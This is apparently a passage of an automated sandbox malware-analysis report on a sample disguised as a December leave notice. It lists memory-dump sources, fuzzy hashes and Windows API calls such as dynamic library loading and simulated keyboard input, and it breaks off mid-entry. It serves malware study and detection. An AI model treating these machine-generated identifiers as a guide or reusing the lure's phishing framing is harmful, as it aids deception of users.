                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                      • API String ID: 2574300362-1587604923
                                                      • Opcode ID: 6d937023644ad886ad081da5797b2589ceec5ec63216ce6e1c886178eda0b830
                                                      • Instruction ID: 9d3af3a25a9c9565811e2485d11b167f781d27a34b13b44fb382c95837d6e6cf
                                                      • Opcode Fuzzy Hash: 6d937023644ad886ad081da5797b2589ceec5ec63216ce6e1c886178eda0b830
                                                      • Instruction Fuzzy Hash: EDD09E70944712AFDB215FA5E419F42B7D8AB44711F14892DE8D592104DE74D4859B70
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,00FC051D,?,00FC05FE), ref: 00FC0547
                                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00FC0559
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                      • API String ID: 2574300362-1071820185
                                                      • Opcode ID: 3c8770ad78e03e702f264baf69beccb199ec19afc511fd4cfee5ca0c207fef55
                                                      • Instruction ID: 8d35694bbb1ca06f859130c60aae51725c639e7cbd6128d3a1d6263513649508
                                                      • Opcode Fuzzy Hash: 3c8770ad78e03e702f264baf69beccb199ec19afc511fd4cfee5ca0c207fef55
                                                      • Instruction Fuzzy Hash: C4D0A730804713EFC7308FA1E409B81B6D8AB04311F14C82DF4C6D2204DF75C8808B60
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FDECBE,?,00FDEBBB), ref: 00FDECD6
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FDECE8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                      • API String ID: 2574300362-1816364905
                                                      • Opcode ID: 7a1271076111f23f4f860720cbbb33defd52697dd6f1d80ca2b32f7c2db36822
                                                      • Instruction ID: ac93fbff76815d20d0824e832c81b91ec2ba4dec2df2eadd9a9915a5e314a2c3
                                                      • Opcode Fuzzy Hash: 7a1271076111f23f4f860720cbbb33defd52697dd6f1d80ca2b32f7c2db36822
                                                      • Instruction Fuzzy Hash: 15D05E30810723AECB216BA1A44868276E8AB04310F04842EA8C5D6200DF74C880E760
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00FDBAD3,00000001,00FDB6EE,?,0101DC00), ref: 00FDBAEB
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FDBAFD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: d567d9950fc183b299ddf37b4e92d1e6b6e74f8300cfc25930967f61e16e6ee2
                                                      • Instruction ID: c6c5402e4ddddc38ce168c9349e7fe0aafa519d2244e77e81c8b44f57176c00e
                                                      • Opcode Fuzzy Hash: d567d9950fc183b299ddf37b4e92d1e6b6e74f8300cfc25930967f61e16e6ee2
                                                      • Instruction Fuzzy Hash: 50D05E30D00712EEC7315FA1A449A55B6D8AB45310F05441FA8C3D2204DB74C880D760
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00FE3BD1,?,00FE3E06), ref: 00FE3BE9
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00FE3BFB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: d35bd6ab46542ec17512f7e34959c110c2c1dde83145e9d02ef40bd972f93816
                                                      • Instruction ID: bc7c23bc3ad7acca8550d3a1a53debe5dcd8e76ca96320c385d920bd33fa02b2
                                                      • Opcode Fuzzy Hash: d35bd6ab46542ec17512f7e34959c110c2c1dde83145e9d02ef40bd972f93816
                                                      • Instruction Fuzzy Hash: B8D09EB0900752EAD7215FEAA41C642BAE9AB49625F20441DE4D5E6104DBB4D8809F61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f67fa27ced43d417d8898ded7a2d33ee8ac8e1211bde481c537dd5698a29b58
                                                      • Instruction ID: 79550a3dbf907e1fe6f2f46065f7012fd7acc13afe981081ac816f91d23416c5
                                                      • Opcode Fuzzy Hash: 1f67fa27ced43d417d8898ded7a2d33ee8ac8e1211bde481c537dd5698a29b58
                                                      • Instruction Fuzzy Hash: BBC15E75A0421AEFCB14DF95C884AEEB7B5FF48710F108598EA05AB291D770DE41EFA0
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00FDAAB4
                                                      • CoUninitialize.OLE32 ref: 00FDAABF
                                                        • Part of subcall function 00FC0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FC027B
                                                      • VariantInit.OLEAUT32(?), ref: 00FDAACA
                                                      • VariantClear.OLEAUT32(?), ref: 00FDAD9D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: 6c8248ef334d1f9bba50fd0d4e6470cc12001875e88ce87e3cde67479253291a
                                                      • Instruction ID: f3c2ecee7f7b9e2333ac9351559954f6680b91cd574d01c8b5fd5790a26c0312
                                                      • Opcode Fuzzy Hash: 6c8248ef334d1f9bba50fd0d4e6470cc12001875e88ce87e3cde67479253291a
                                                      • Instruction Fuzzy Hash: 35A17D356047019FDB11EF14C881B6EB7E6BF88720F18444AF9969B3A1CB74ED05EB86
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: a9fd35a43e810dd89078a9ad0a9cb9069c3e4eae6e840b841629ea86fd55c209
                                                      • Instruction ID: 0cd3c31354207f0bbfd718127ec976ae29b6b0b009daaf8701aca3159ce1c74e
                                                      • Opcode Fuzzy Hash: a9fd35a43e810dd89078a9ad0a9cb9069c3e4eae6e840b841629ea86fd55c209
                                                      • Instruction Fuzzy Hash: 5951AC31A087069BDB249F67D8957AEB3E9EF45310F24881FE746C72D1DBB49880AF11
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                      • String ID:
                                                      • API String ID: 3877424927-0
                                                      • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                      • Instruction ID: bb2f495d285573782b2f7aae2203acd2cc5655acaa53c2b2a4a152fb9c9add68
                                                      • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                      • Instruction Fuzzy Hash: 1051A2F5E04305ABDB249FA9C884A6E77B5AF42330F248729F825963D0D774AF50EB50
                                                      APIs
                                                      • GetWindowRect.USER32(018675C0,?), ref: 00FEC544
                                                      • ScreenToClient.USER32(?,00000002), ref: 00FEC574
                                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00FEC5DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: 4ef92d32cc9257e3e488efd486517b0743456dfa41181056c8431f30c63d9f30
                                                      • Instruction ID: 605e2ab1629b8353d4448646607470c193eec729912b0a505099edcdff4176f3
                                                      • Opcode Fuzzy Hash: 4ef92d32cc9257e3e488efd486517b0743456dfa41181056c8431f30c63d9f30
                                                      • Instruction Fuzzy Hash: 13515EB5900244EFCF20DF69C880AAE7BB5FF59320F148659F95997284D734ED82DB90
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FBC462
                                                      • __itow.LIBCMT ref: 00FBC49C
                                                        • Part of subcall function 00FBC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FBC753
                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FBC505
                                                      • __itow.LIBCMT ref: 00FBC55A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: 95b30d275e1c9620c3b9e8df77ba43c00c3661f449773628aa789aa6cf342506
                                                      • Instruction ID: f8fcacd8a1faeb0d772e9303804249dc8d60a747efc68424aebdb330e3e5ea67
                                                      • Opcode Fuzzy Hash: 95b30d275e1c9620c3b9e8df77ba43c00c3661f449773628aa789aa6cf342506
                                                      • Instruction Fuzzy Hash: CC41E371A00608AFDF21EF55CC46BEF7BB9AF49710F000019F905A7281DB789A459FA1
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FC3966
                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00FC3982
                                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00FC39EF
                                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00FC3A4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 4aeeb8651ec63a1d668cd9da05e467548a63e854cb67c6f45b4203ebf1ee215c
                                                      • Instruction ID: d4827b8dcdffad1a7432ccb14605d05206e505b6aa710c28324bfdb4f3813520
                                                      • Opcode Fuzzy Hash: 4aeeb8651ec63a1d668cd9da05e467548a63e854cb67c6f45b4203ebf1ee215c
                                                      • Instruction Fuzzy Hash: B7412C70E04209AEEF358BA48907FFDBBB69B55360F04815EE4C1625C1C7B98E85F761
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FCE742
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00FCE768
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FCE78D
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FCE7B9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: 95e33bdf68d6ee1b0d71e4fcca8c195c9ec20905ccecd1406f4f448c3a0cd080
                                                      • Instruction ID: c9f7b42d8099897d9ea69e2eb6c82d42a8a31bc5c862ab9f2fdd8e8f4f3b1499
                                                      • Opcode Fuzzy Hash: 95e33bdf68d6ee1b0d71e4fcca8c195c9ec20905ccecd1406f4f448c3a0cd080
                                                      • Instruction Fuzzy Hash: 16416A39600611DFCF12EF54C945A5DBBE5BF59720F088088E956AB3A2CB78FD00EB91
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FEB5D1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: dae82514133f59e51cbfa5762c5fccc9a0af9b0d3e580c6eb9729d8a36c42809
                                                      • Instruction ID: 5448685e8db3c27dd4e823f2753c99e26f3df41db7eca85caad694281926e36c
                                                      • Opcode Fuzzy Hash: dae82514133f59e51cbfa5762c5fccc9a0af9b0d3e580c6eb9729d8a36c42809
                                                      • Instruction Fuzzy Hash: 91313374A01284BFEF319F9ACC84FAE3764EB05320F184552F641D61E5CB34E940BB51
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 00FED807
                                                      • GetWindowRect.USER32(?,?), ref: 00FED87D
                                                      • PtInRect.USER32(?,?,00FEED5A), ref: 00FED88D
                                                      • MessageBeep.USER32(00000000), ref: 00FED8FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: c972ea75271d4d8b05449fedcd64f909cd33807a062f546ece546fb129a1f14e
                                                      • Instruction ID: fe1b38ca67c6c1584b60e68debff8b2d5c76e3aa7e1f0b5aa7d2609d1d173099
                                                      • Opcode Fuzzy Hash: c972ea75271d4d8b05449fedcd64f909cd33807a062f546ece546fb129a1f14e
                                                      • Instruction Fuzzy Hash: 3341D0B4E00288DFCB21DF9AC880BA97BF5FF49360F1881A9E454DB644C331EA45DB51
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00FC3AB8
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00FC3AD4
                                                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00FC3B34
                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00FC3B92
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 2574acc1970c4ec45b9b17fae874a29d254684463a250eec2dba80705b75c5ff
                                                      • Instruction ID: 44004fd22e5947e2a921beec1e0d2c229a0f5e5fded835372e66c132688d68f7
                                                      • Opcode Fuzzy Hash: 2574acc1970c4ec45b9b17fae874a29d254684463a250eec2dba80705b75c5ff
                                                      • Instruction Fuzzy Hash: 3D316630D0025AAEEF318BA48A1BFFD7BB59B85360F04411EE481A31C1C7798F41E761
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FB4038
                                                      • __isleadbyte_l.LIBCMT ref: 00FB4066
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00FB4094
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00FB40CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 26242e8c0052bc9f2a6bbfa47f553da6027d2f5109dbf49b24cb749e72bfebfd
                                                      • Instruction ID: 9f63ed0e1b80294b7000ff0d4b4e19c12f44471d0c1bd1526f001fcd95d4c8ef
                                                      • Opcode Fuzzy Hash: 26242e8c0052bc9f2a6bbfa47f553da6027d2f5109dbf49b24cb749e72bfebfd
                                                      • Instruction Fuzzy Hash: CC31D431A00215AFDB21AF76C944BFA7BB5FF413A0F154018E66187192D731E890EF90
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00FE7CB9
                                                        • Part of subcall function 00FC5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FC5F6F
                                                        • Part of subcall function 00FC5F55: GetCurrentThreadId.KERNEL32 ref: 00FC5F76
                                                        • Part of subcall function 00FC5F55: AttachThreadInput.USER32(00000000,?,00FC781F), ref: 00FC5F7D
                                                      • GetCaretPos.USER32(?), ref: 00FE7CCA
                                                      • ClientToScreen.USER32(00000000,?), ref: 00FE7D03
                                                      • GetForegroundWindow.USER32 ref: 00FE7D09
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 5f0d6ee54b613c88b49dd30586598eca39caca18a14945681a7019af3f4817d7
                                                      • Instruction ID: bd0f06ef8d1bb6a4e2946333ec62fbfbb26f3902c51ace3f8ea5ccf9edb65401
